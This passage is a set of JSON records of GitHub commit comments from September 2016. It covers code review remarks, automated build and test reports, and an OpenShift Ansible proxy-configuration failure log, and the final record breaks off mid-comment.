{"id":"4591517530","type":"CommitCommentEvent","actor":{"login":"WhiteLord"},"repo":{"name":"YordanDringov/test-repo"},"payload":{"comment":{"id":19101522,"position":4,"line":5,"path":"testing.txt","commit_id":"74fb69d29355b5f933c5b21aee21b4e0f4e58619","created_at":"2016-09-20T18:22:32Z","updated_at":"2016-09-20T18:22:32Z","body":"awe ko naprai ti we maina"}},"created_at":"2016-09-20T18:22:32Z"}
{"id":"4591518717","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19101526,"position":null,"line":null,"path":null,"commit_id":"460270baaf7d587ebe13ec7ab5b9684c81eba968","created_at":"2016-09-20T18:22:42Z","updated_at":"2016-09-20T18:22:42Z","body":"Just for the record, I suggested setting it to a string because pretty much every other Wesnoth metatable does this and also because it enables you to test the type of something by calling getmetatable()."}},"created_at":"2016-09-20T18:22:42Z"}
{"id":"4591522508","type":"CommitCommentEvent","actor":{"login":"YordanDringov"},"repo":{"name":"YordanDringov/test-repo"},"payload":{"comment":{"id":19101538,"position":2,"line":3,"path":"testing.txt","commit_id":"74fb69d29355b5f933c5b21aee21b4e0f4e58619","created_at":"2016-09-20T18:23:15Z","updated_at":"2016-09-20T18:23:15Z","body":"не става брат"}},"created_at":"2016-09-20T18:23:15Z"}
{"id":"4591529137","type":"CommitCommentEvent","actor":{"login":"MitchBradley"},"repo":{"name":"MitchBradley/cforth"},"payload":{"comment":{"id":19101548,"position":null,"line":null,"path":null,"commit_id":"ee46dfb7b06ae3f8181881bbbb289ac9f3d16825","created_at":"2016-09-20T18:24:16Z","updated_at":"2016-09-20T18:24:16Z","body":"I have no idea what init-state is or how it got there.  Possibly a brain fart.  I deleted that line."}},"created_at":"2016-09-20T18:24:16Z"}
{"id":"4591532339","type":"CommitCommentEvent","actor":{"login":"kasperp"},"repo":{"name":"kasperp/eslint-bot"},"payload":{"comment":{"id":19101554,"position":6,"line":null,"path":"config.js","commit_id":"3c2ec51d03f13a975ce57b0d90c1e1ba935241dc","created_at":"2016-09-20T18:24:45Z","updated_at":"2016-09-20T18:24:45Z","body":"**Eslint**: Parsing error: Illegal export declaration"}},"created_at":"2016-09-20T18:24:45Z"}
{"id":"4591541029","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"taskcluster/taskcluster-lib-monitor"},"payload":{"comment":{"id":19101576,"position":null,"line":null,"path":null,"commit_id":"95c3ec991e5ac70a05d157d731b513c1d5959150","created_at":"2016-09-20T18:26:00Z","updated_at":"2016-09-20T18:26:00Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#IuHbcYFgSqmPNacs1k5E9Q"}},"created_at":"2016-09-20T18:26:00Z"}
{"id":"4591543738","type":"CommitCommentEvent","actor":{"login":"kasperp"},"repo":{"name":"kasperp/eslint-bot"},"payload":{"comment":{"id":19101587,"position":6,"line":null,"path":"config.js","commit_id":"3c2ec51d03f13a975ce57b0d90c1e1ba935241dc","created_at":"2016-09-20T18:26:23Z","updated_at":"2016-09-20T18:26:23Z","body":"**Eslint**: Parsing error: Illegal export declaration"}},"created_at":"2016-09-20T18:26:23Z"}
{"id":"4591547530","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19101594,"position":null,"line":null,"path":null,"commit_id":"92bcfccfab5365bd1e42990896fb81ba0ef118de","created_at":"2016-09-20T18:26:57Z","updated_at":"2016-09-20T18:26:57Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2314 of 2478 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-92bcfccfab5365bd1e42990896fb81ba0ef118de-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-92bcfccfab5365bd1e42990896fb81ba0ef118de-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.38%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T18:26:57Z"}
{"id":"4591552404","type":"CommitCommentEvent","actor":{"login":"bobwolff68"},"repo":{"name":"FRCTeam1967/FRCTeam1967"},"payload":{"comment":{"id":19101606,"position":17,"line":392,"path":"code/2016_Stronghold/src/Robot.cpp","commit_id":"9ebe2323262481d2a2ddd6fe4c01f9f07ace8e0a","created_at":"2016-09-20T18:27:48Z","updated_at":"2016-09-20T18:27:48Z","body":"Would prefer to see such hard-coded values be part of a #define or const definition to give it a name. It is much easier to maintain code that is named well than to chase down \"numbers\" in odd places."}},"created_at":"2016-09-20T18:27:48Z"}
{"id":"4591554322","type":"CommitCommentEvent","actor":{"login":"seegerseeger"},"repo":{"name":"os-data/eu-structural-funds"},"payload":{"comment":{"id":19101614,"position":null,"line":null,"path":null,"commit_id":"d2781e5e2f17e950b3aab647b1f096b6985a04de","created_at":"2016-09-20T18:28:06Z","updated_at":"2016-09-20T18:28:06Z","body":"Timeframe 2007-2013 is done for Austria. 2014-2020 will be done next. There is very little data in the documents for Austria. Usually only: beneficiary, project name, name of the operation, allocated pulic funding (EU+national cofinancing), G = commited, A = paid out. "}},"created_at":"2016-09-20T18:28:06Z"}
{"id":"4591561615","type":"CommitCommentEvent","actor":{"login":"PavelShar"},"repo":{"name":"PavelShar/untitled"},"payload":{"comment":{"id":19101634,"position":5,"line":5,"path":"test.js","commit_id":"f7deeee1a399b0b0017cbfaf94d5e171e1b9b3c5","created_at":"2016-09-20T18:29:18Z","updated_at":"2016-09-20T18:29:18Z","body":"Bad!"}},"created_at":"2016-09-20T18:29:18Z"}
{"id":"4591562851","type":"CommitCommentEvent","actor":{"login":"olegrjumin"},"repo":{"name":"olegrjumin/Health-App-Calendar-UI"},"payload":{"comment":{"id":19101635,"position":12,"line":388,"path":"js/main.js","commit_id":"0df6f025039729221f0b81095aece70ee5c955a1","created_at":"2016-09-20T18:29:32Z","updated_at":"2016-09-20T18:29:32Z","body":"another"}},"created_at":"2016-09-20T18:29:32Z"}
{"id":"4591565348","type":"CommitCommentEvent","actor":{"login":"aliakpinar"},"repo":{"name":"aliakpinar/panel"},"payload":{"comment":{"id":19101641,"position":null,"line":null,"path":null,"commit_id":"e330d9c4f3dca65af6c80e370c05b2eb64dae0a6","created_at":"2016-09-20T18:29:57Z","updated_at":"2016-09-20T18:29:57Z","body":"Isı Nem Ölçer "}},"created_at":"2016-09-20T18:29:57Z"}
{"id":"4591565407","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19101642,"position":null,"line":null,"path":null,"commit_id":"a2992eb9fcd2f72f73880897155b6eb78c1f8a44","created_at":"2016-09-20T18:29:58Z","updated_at":"2016-09-20T18:29:58Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.249.a2992eb9fcd2f72f73880897155b6eb78c1f8a44](http://build.palaso.org/viewLog.html?buildId=76974&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:08:17"}},"created_at":"2016-09-20T18:29:58Z"}
{"id":"4591566654","type":"CommitCommentEvent","actor":{"login":"Martoon-00"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19101645,"position":73,"line":130,"path":"src/Control/TimeWarp/Timed/MonadTimed.hs","commit_id":"f352b1665caa13a32784c753d7cd014feb2be966","created_at":"2016-09-20T18:30:10Z","updated_at":"2016-09-20T18:30:10Z","body":"Oh, I meant we can move it away from typeclass. But not earlier than pure `timeout` would be implemented like in http://hackage.haskell.org/package/base-4.9.0.0/docs/System-Timeout.html#v:timeout . \r\nAnd yes, actually there is no need in `MVar` ("}},"created_at":"2016-09-20T18:30:10Z"}
{"id":"4591570128","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19101648,"position":null,"line":null,"path":null,"commit_id":"62f04f91cc14ca4c45d6f6db68c793bf33067fa2","created_at":"2016-09-20T18:30:44Z","updated_at":"2016-09-20T18:30:44Z","body":"ReplaceEPLaunchLite (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2333 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T18:30:44Z"}
{"id":"4591572880","type":"CommitCommentEvent","actor":{"login":"davebotelho"},"repo":{"name":"openshift/openshift-ansible"},"payload":{"comment":{"id":19101652,"position":null,"line":null,"path":null,"commit_id":"be8ada8017881f349a68759d95cf31c28ebed86d","created_at":"2016-09-20T18:31:11Z","updated_at":"2016-09-20T18:31:11Z","body":"my node /etc/sysconfig/origin-node files proxy vars are commented out and sending failures on install\r\n\r\n#NO_PROXY=master.example.com\r\n#HTTP_PROXY=http://USER:PASSWORD@IPADDR:PORT\r\n#HTTPS_PROXY=https://USER:PASSWORD@IPADDR:PORT\r\n\r\nstarted getting failures on installations today after pulling latest.\r\n\r\n[‎09/‎20/‎2016 2:01 PM] Botelho, David: \r\nNo Title\r\nTASK [openshift_node : Configure Proxy Settings] *******************************\r\n[DEPRECATION WARNING]: Skipping task due to undefined Error, in the future this will be a fatal\r\nerror.: 'dict object' has no attribute 'master'.\r\nThis feature will be removed in a future release.\r\nDeprecation warnings can be disabled by setting deprecation_warnings=False in ansible.cfg.\r\n[DEPRECATION WARNING]: Skipping task due to undefined Error, in the future this will be a fatal\r\nerror.: 'dict object' has no attribute 'master'.\r\nThis feature will be removed in a future release.\r\nDeprecation warnings can be disabled by setting deprecation_warnings=False in ansible.cfg.\r\nfatal: [10.236.2.196]: FAILED! => {\"failed\": true, \"msg\": \"the field 'args' has an invalid value, which appears to include a variable that is undefined. The error was: 'item' is undefined\\n\\nThe error appears to have been in '/home/cloud_user/openshift-ansible/roles/openshift_node/tasks/systemd_units.yml': line 51, column 3, but may\\nbe elsewhere in the file depending on the exact syntax problem.\\n\\nThe offending line appears to be:\\n\\n\\n- name: Configure Proxy Settings\\n  ^ here\\n\"}\r\nfatal: [10.236.2.195]: FAILED! => {\"failed\": true, \"msg\": \"the field 'args' has an invalid value, which appears to include a variable that is undefined. The error was: 'item' is undefined\\n\\nThe error appears to have been in '/home/cloud_user/openshift-ansible/roles/openshift_node/tasks/systemd_units.yml': line 51, column 3, but may\\nbe elsewhere in the file depending on the exact syntax problem.\\n\\nThe offending line appears to be:\\n\\n\\n- name: Configure Proxy Settings\\n  ^ here\\n\"}\r\nchanged: [master.openshift-lab1.fmr.com] => (item={u'regex': u'^HTTP_PROXY=', u'line': u'HTTP_PROXY=http://http.proxy.fmr.com:8000'})\r\nchanged: [master.openshift-lab1.fmr.com] => (item={u'regex': u'^HTTPS_PROXY=', u'line': u'HTTPS_PROXY=http://http.proxy.fmr.com:8000'})\r\nchanged: [master.openshift-lab1.fmr.com] => (item={u'regex': u'^NO_PROXY=', u'line': u'NO_PROXY=.cluster.local,10.236.2.195,10.236.2.196,master.openshift-lab1.fmr.com,172.30.0.0/16,10.1.0.0/16'}) \r\n"}},"created_at":"2016-09-20T18:31:11Z"}
{"id":"4591588317","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":19101688,"position":null,"line":null,"path":null,"commit_id":"4092f990ec53d7895504bb453216f1c99a14c14f","created_at":"2016-09-20T18:33:47Z","updated_at":"2016-09-20T18:33:47Z","body":"@wheresmyjetpack test cases required for this. specially around multiple tags."}},"created_at":"2016-09-20T18:33:47Z"}
{"id":"4591589065","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19101690,"position":null,"line":null,"path":null,"commit_id":"d9cdbcc34ef342c13170e8f53d4416ffdd6f057f","created_at":"2016-09-20T18:33:54Z","updated_at":"2016-09-20T18:33:54Z","body":"This breaks libcaca.x86_64-darwin.\r\n\r\nhttp://hydra.nixos.org/build/40837493"}},"created_at":"2016-09-20T18:33:54Z"}
{"id":"4591593865","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19101706,"position":null,"line":null,"path":null,"commit_id":"1abbd1d39dcc194a4206cd6150799acad97f608e","created_at":"2016-09-20T18:34:45Z","updated_at":"2016-09-20T18:34:45Z","body":"Not sure why you have change the failhard should default to False,   you have changed it to True for _refresh_db_conditional()\r\n\r\nThis is the reason for the extra code lines for example in \r\nstates/pkg.py \r\n```\r\n    list_pkgs_kwargs = copy.copy(kwargs)\r\n    list_pkgs_kwargs['versions_as_list'] = True\r\n    if salt.utils.is_windows():\r\n        list_pkgs_kwargs['failhard'] = False\r\n```\r\nAnd other places.\r\n\r\nI suggest you return the default to False for failhard within _refresh_db_conditional() and remove the extra code you have added to work around this being set to True.\r\n\r\n```\r\ndef _refresh_db_conditional(saltenv, **kwargs):\r\n    '''\r\n    Internal use only in this module, ****has a different set of defaults**** and\r\n    returns True or False. And supports check the age of the existing\r\n    generated metadata db, as well as ensure metadata db exists to begin with\r\n\r\n    :param str setenv: Salt environment\r\n    :return: True Fetched or Cache uptodate, False to indicate an issue\r\n    :rtype: bool\r\n\r\n    :codeauthor: Damon Atkins <https://github.com/damon-atkins>\r\n    '''\r\n    refresh_force = salt.utils.is_true(kwargs.pop('force', False))\r\n    raise_error = salt.utils.is_true(kwargs.pop('raise_error', False))\r\n    expired_max = 21600  # 6hr same as yum\r\n    expired_min = 0  # i.e. ignore force request if less than this young\r\n```\r\n"}},"created_at":"2016-09-20T18:34:45Z"}
{"id":"4591594176","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19101707,"position":null,"line":null,"path":null,"commit_id":"ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004","created_at":"2016-09-20T18:34:48Z","updated_at":"2016-09-20T18:34:48Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T18:34:48Z"}
{"id":"4591594224","type":"CommitCommentEvent","actor":{"login":"mizantrop2397"},"repo":{"name":"Jaypaw/water_edit"},"payload":{"comment":{"id":19101708,"position":5,"line":428,"path":"src/controller/MainWindowController.java","commit_id":"7df770724a97f9401dfdcbb7f3fdefe22f46675c","created_at":"2016-09-20T18:34:49Z","updated_at":"2016-09-20T18:34:49Z","body":"Не надо так делать. если xlsFileHandler.getErrorsArray() вернет null, то 1) Скорее всего будет NPE, 2) В любом случае лучше делать через != null"}},"created_at":"2016-09-20T18:34:49Z"}
{"id":"4591614878","type":"CommitCommentEvent","actor":{"login":"lukemarsden"},"repo":{"name":"taimir/kubernetes"},"payload":{"comment":{"id":19101755,"position":null,"line":null,"path":null,"commit_id":"c3860a5241f73adecde384eff5c1c83a363854b1","created_at":"2016-09-20T18:38:18Z","updated_at":"2016-09-20T18:38:18Z","body":"@taimir would love if you can test https://lukemarsden.github.io/docs/kubeadm/ Ubuntu Xenial instructions please? RPMs are known to not be working yet, but would love if you can see if Ubuntu works for you."}},"created_at":"2016-09-20T18:38:18Z"}
{"id":"4591616395","type":"CommitCommentEvent","actor":{"login":"PGWelch"},"repo":{"name":"graphhopper/jsprit"},"payload":{"comment":{"id":19101761,"position":null,"line":null,"path":null,"commit_id":"42ae57d00b3c30c3cebe5451af08bffd061fb479","created_at":"2016-09-20T18:38:34Z","updated_at":"2016-09-20T18:38:34Z","body":"Hi Stefan,\r\n\r\nSo for a shipment with pickup P1 and delivery D1, this is a constraint of the form arrivaltime(D1) – arrivaltime(P1) < maxTimeInVehicle, yes? (or similarly, arrivaltime(D1) – leavetime(P1) < maxTimeInVehicle).\r\n\r\nIf so, there’s a complex case that I’m not sure if your code handles or not. Anyway, given a route with one shipment (P1, D1):\r\n\r\nP1, D1\r\n\r\nWe try inserting another shipment (P2, D2) as follows,\r\n\r\nP2, P1, D2, D1\r\n\r\nWhen we’re testing the feasibility of inserting D2 (in the hardactivityconstraint fulfilled method), the latest arrival time at D1 has actually become later due to the insertion of P2 before P1. I think that your stateupdater code wouldn’t know about the insertion of P2, because this is only called when an insertion is actually made, and not in the ShipmentInsertionCalculator when you evaluate the insertion for P2? The result would be that you could reject the insertion of (P2, D2) as infeasible because you think you’d break the maxTimeInVehicle constraint at D1, however as the latest arrival time at D1 would actually be later, the insertion might still be feasible. You’d therefore miss valid insertions.\r\n\r\nDoes this make sense? Apologies if your code does handle this case, it wasn’t clear to me that it could without modifying the ShipmentInsertionCalculator to recalculate the latest arrival times for all shipment deliveries, when it considers each pickup position?\r\n\r\nBest regards\r\n\r\nPhil\r\n\r\n"}},"created_at":"2016-09-20T18:38:34Z"}
{"id":"4591616552","type":"CommitCommentEvent","actor":{"login":"flnative"},"repo":{"name":"magento/magento2"},"payload":{"comment":{"id":19101763,"position":null,"line":null,"path":null,"commit_id":"23103c03c527fe1ed3e1a3be691436818b7963fe","created_at":"2016-09-20T18:38:35Z","updated_at":"2016-09-20T18:38:35Z","body":"I have this issue. What is the status on this? So everyone who is using 2.1 is sending Luma logo emails? "}},"created_at":"2016-09-20T18:38:35Z"}
{"id":"4591627234","type":"CommitCommentEvent","actor":{"login":"okbel"},"repo":{"name":"coralproject/elkhorn"},"payload":{"comment":{"id":19101781,"position":6,"line":19,"path":"src/components/fields/MultipleChoice.js","commit_id":"0d44948c64a5b91e7312a0431c8657a101c83e43","created_at":"2016-09-20T18:40:25Z","updated_at":"2016-09-20T18:40:25Z","body":"👍 "}},"created_at":"2016-09-20T18:40:25Z"}
{"id":"4591629936","type":"CommitCommentEvent","actor":{"login":"okbel"},"repo":{"name":"coralproject/elkhorn"},"payload":{"comment":{"id":19101789,"position":null,"line":null,"path":null,"commit_id":"0d44948c64a5b91e7312a0431c8657a101c83e43","created_at":"2016-09-20T18:40:53Z","updated_at":"2016-09-20T18:40:53Z","body":"Thanks for linting. I'll set up my IDE ASAP."}},"created_at":"2016-09-20T18:40:53Z"}
{"id":"4591636749","type":"CommitCommentEvent","actor":{"login":"chrisokamoto"},"repo":{"name":"leikind/wice_grid"},"payload":{"comment":{"id":19101809,"position":null,"line":null,"path":null,"commit_id":"66eb904864ed02acb10d1e8c42363b390076ea3b","created_at":"2016-09-20T18:41:53Z","updated_at":"2016-09-20T18:41:53Z","body":"I this this isn't in a released gem yet... When will you provide it?"}},"created_at":"2016-09-20T18:41:53Z"}
{"id":"4591643747","type":"CommitCommentEvent","actor":{"login":"voltdatalab"},"repo":{"name":"voltdatalab/fordata"},"payload":{"comment":{"id":19101825,"position":null,"line":null,"path":null,"commit_id":"05cac3e80cb1f83558d93c2707da198bd2fb7baa","created_at":"2016-09-20T18:42:58Z","updated_at":"2016-09-20T18:42:58Z","body":"add victory"}},"created_at":"2016-09-20T18:42:58Z"}
{"id":"4591646113","type":"CommitCommentEvent","actor":{"login":"jupe"},"repo":{"name":"subterfugium/android_kernel_asus_flo"},"payload":{"comment":{"id":19101829,"position":8,"line":372,"path":"kernel/timeconst.pl","commit_id":"b86c6d6b524e4d6f30f76b9de35cb955e2f85005","created_at":"2016-09-20T18:43:21Z","updated_at":"2016-09-20T18:43:21Z","body":"why this extra variable?"}},"created_at":"2016-09-20T18:43:21Z"}
{"id":"4591646845","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19101833,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-20T18:43:28Z","updated_at":"2016-09-20T18:43:28Z","body":"ASIHP-validation1 (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2330 of 2338 tests passed, 3 test warnings)\n\n * 11 tests had: AUD diffs.\n * 11 tests had: ERR diffs.\n * 8 tests had: Table big diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T18:43:28Z"}
{"id":"4591649656","type":"CommitCommentEvent","actor":{"login":"Sireeni"},"repo":{"name":"gentoo-haskell/gentoo-haskell"},"payload":{"comment":{"id":19101836,"position":null,"line":null,"path":null,"commit_id":"6c37eb41b678044dce9b5f3568a933547c60a681","created_at":"2016-09-20T18:43:56Z","updated_at":"2016-09-20T18:43:56Z","body":":heart:"}},"created_at":"2016-09-20T18:43:56Z"}
{"id":"4591651302","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19101839,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-20T18:44:11Z","updated_at":"2016-09-20T18:44:11Z","body":"Please try VZW just to be sure, and let me know about loki...!"}},"created_at":"2016-09-20T18:44:11Z"}
{"id":"4591653421","type":"CommitCommentEvent","actor":{"login":"subterfugium"},"repo":{"name":"subterfugium/android_kernel_asus_flo"},"payload":{"comment":{"id":19101841,"position":8,"line":372,"path":"kernel/timeconst.pl","commit_id":"b86c6d6b524e4d6f30f76b9de35cb955e2f85005","created_at":"2016-09-20T18:44:32Z","updated_at":"2016-09-20T18:44:32Z","body":"For science!"}},"created_at":"2016-09-20T18:44:32Z"}
{"id":"4591656983","type":"CommitCommentEvent","actor":{"login":"kribblo"},"repo":{"name":"ltnetwork/node-ffmpeg-installer"},"payload":{"comment":{"id":19101853,"position":null,"line":null,"path":null,"commit_id":"3b23f6866fd19c18894368b4c09027a533a155cf","created_at":"2016-09-20T18:45:10Z","updated_at":"2016-09-20T18:45:10Z","body":"Made this change myself, if you want to try it a new version has been published to NPM. Otherwise, there's an issue here if it doesn't work: https://github.com/kribblo/node-ffmpeg-installer/issues/3"}},"created_at":"2016-09-20T18:45:10Z"}
{"id":"4591659001","type":"CommitCommentEvent","actor":{"login":"FernBch"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19101861,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-20T18:45:30Z","updated_at":"2016-09-20T18:45:30Z","body":"As soon as I can get to WiFi I will download and test on VZW."}},"created_at":"2016-09-20T18:45:30Z"}
{"id":"4591667514","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19101883,"position":null,"line":null,"path":null,"commit_id":"2412c650b46d8e7eff3d9a5fb53c5eb09052c3ec","created_at":"2016-09-20T18:46:57Z","updated_at":"2016-09-20T18:46:57Z","body":"Not sure why you have change the failhard default to True,   it should be False for _refresh_db_conditional()      and True only for refresh_db called directly.\r\n\r\nThis is the reason for the extra code lines for example in \r\nstates/pkg.py     These lines should not be required with _refresh_db_conditional()  failhard  default as False.\r\n```\r\n    list_pkgs_kwargs = copy.copy(kwargs)\r\n    list_pkgs_kwargs['versions_as_list'] = True\r\n    if salt.utils.is_windows():\r\n        list_pkgs_kwargs['failhard'] = False\r\n```\r\nAnd other places.\r\n\r\nI suggest you return the default to False for failhard within _refresh_db_conditional() and remove the extra code you have added to work around this being set to True.\r\n\r\nIf you really want _refresh_db_conditional(saltenv, **kwargs) to have a default of failhard true I suggest you change every line of code with _refresh_db_conditional to include failhard=False in win_pkg.py\r\n\r\n```\r\ndef _refresh_db_conditional(saltenv, **kwargs):\r\n    '''\r\n    Internal use only in this module, ****has a different set of defaults**** and\r\n    returns True or False. And supports check the age of the existing\r\n    generated metadata db, as well as ensure metadata db exists to begin with\r\n\r\n    :param str setenv: Salt environment\r\n    :return: True Fetched or Cache uptodate, False to indicate an issue\r\n    :rtype: bool\r\n\r\n    :codeauthor: Damon Atkins <https://github.com/damon-atkins>\r\n    '''\r\n    refresh_force = salt.utils.is_true(kwargs.pop('force', False))\r\n    raise_error = salt.utils.is_true(kwargs.pop('raise_error', False))\r\n    expired_max = 21600  # 6hr same as yum\r\n    expired_min = 0  # i.e. ignore force request if less than this young\r\n```"}},"created_at":"2016-09-20T18:46:57Z"}
{"id":"4591667933","type":"CommitCommentEvent","actor":{"login":"jmarsc"},"repo":{"name":"jmarsc/hello-world"},"payload":{"comment":{"id":19101885,"position":null,"line":null,"path":null,"commit_id":"9bc71eb6094ce986fac0d3947568c5fbaca67fab","created_at":"2016-09-20T18:47:01Z","updated_at":"2016-09-20T18:47:01Z","body":"https://guides.github.com/activities/hello-world/"}},"created_at":"2016-09-20T18:47:01Z"}
{"id":"4591672178","type":"CommitCommentEvent","actor":{"login":"vctrfrnndz"},"repo":{"name":"OlegWock/stylus-angled-edges"},"payload":{"comment":{"id":19101897,"position":1,"line":1,"path":"README.md","commit_id":"6e8811b4b91efa6bf4418bd584e805b12566ece4","created_at":"2016-09-20T18:47:46Z","updated_at":"2016-09-20T18:47:46Z","body":"Was going to do this myself this is awesome 👍 "}},"created_at":"2016-09-20T18:47:46Z"}
{"id":"4591676603","type":"CommitCommentEvent","actor":{"login":"kkitov"},"repo":{"name":"StambestoPresident/SOFTUNI_EXERCISE"},"payload":{"comment":{"id":19101904,"position":null,"line":null,"path":null,"commit_id":"19abf99c8882cf409a908590382f58ca5a404fb8","created_at":"2016-09-20T18:48:32Z","updated_at":"2016-09-20T18:48:32Z","body":"asdasasd"}},"created_at":"2016-09-20T18:48:32Z"}
{"id":"4591685885","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19101922,"position":null,"line":null,"path":null,"commit_id":"c6714a07cbfd353363e266d3a16d2921d6196532","created_at":"2016-09-20T18:50:10Z","updated_at":"2016-09-20T18:50:10Z","body":"approved, please commit, thanks!"}},"created_at":"2016-09-20T18:50:10Z"}
{"id":"4591686216","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19101924,"position":52,"line":58,"path":"src/Control/TimeWarp/Timed/MonadTimed.hs","commit_id":"2a2a1450d8e983b7ef4ca56e21e1807a7a3b5285","created_at":"2016-09-20T18:50:13Z","updated_at":"2016-09-20T18:50:13Z","body":"Yes, I find it more natural too."}},"created_at":"2016-09-20T18:50:13Z"}
{"id":"4591688791","type":"CommitCommentEvent","actor":{"login":"Martoon-00"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19101928,"position":null,"line":null,"path":null,"commit_id":"5ef98c8da84dcf0195eb3ae9a1bf016d263cbf7e","created_at":"2016-09-20T18:50:38Z","updated_at":"2016-09-20T18:50:38Z","body":"Mm, logDebug has constraints `WithNamedLogger m, MonadIO m`, and `(->) Something` can't be `MonadIO`.\r\nHas  `logDebug \"message\" \"logger name\"` ever worked?"}},"created_at":"2016-09-20T18:50:38Z"}
{"id":"4591691647","type":"CommitCommentEvent","actor":{"login":"sdillingham"},"repo":{"name":"SCPR/scpr-style-guide"},"payload":{"comment":{"id":19101933,"position":null,"line":null,"path":null,"commit_id":"3fa66614b14976d91ac18dbd83096047e2c9cb04","created_at":"2016-09-20T18:51:08Z","updated_at":"2016-09-20T18:51:08Z","body":"This is definitely heading in the right direction @Ravenstine. Some general feedback:\r\n\r\n### Use [KSS](http://warpspire.com/kss/) declaration at the top of each CSS file\r\n\r\nI've adopted a convention of declaring some documentation comments at the top of each CSS file. See https://github.com/SCPR/scpr-style-guide/blob/master/src/css/layout/_containers.scss#L2-L10 for an example, and [the KSS website](http://warpspire.com/kss/) for full documentation of this approach.\r\n\r\n### all CSS dealing with layout should be prefixed with `l-`\r\n\r\ne.g. `l-col` and `l-row`. We use `l-` for layout classes, `o-` for objects, `c-` for components, etc. to make it easier in your markup to know what job a particular class is doing.\r\n\r\n### Use existing containers classes\r\n\r\nCreating containers for grid columns to lice inside is done here: https://github.com/SCPR/scpr-style-guide/blob/master/src/css/layout/_containers.scss#L2-L10. I don't think the top-level `.grid` class you created is necessary.\r\n\r\n### The grid math should incorporate columns and gutters, not just column width.  \r\n\r\nAll our grid dimensions can be calculated off a base number of `6`. Here's the dimensions to take into account: \r\n\r\nMax XL container size: 1326px (221 * 6)\r\nColumn width: 72px (12 * 6)\r\nGutter width: 42px (7*6)\r\n\r\nAll pixel dimensions should be converted to ems or 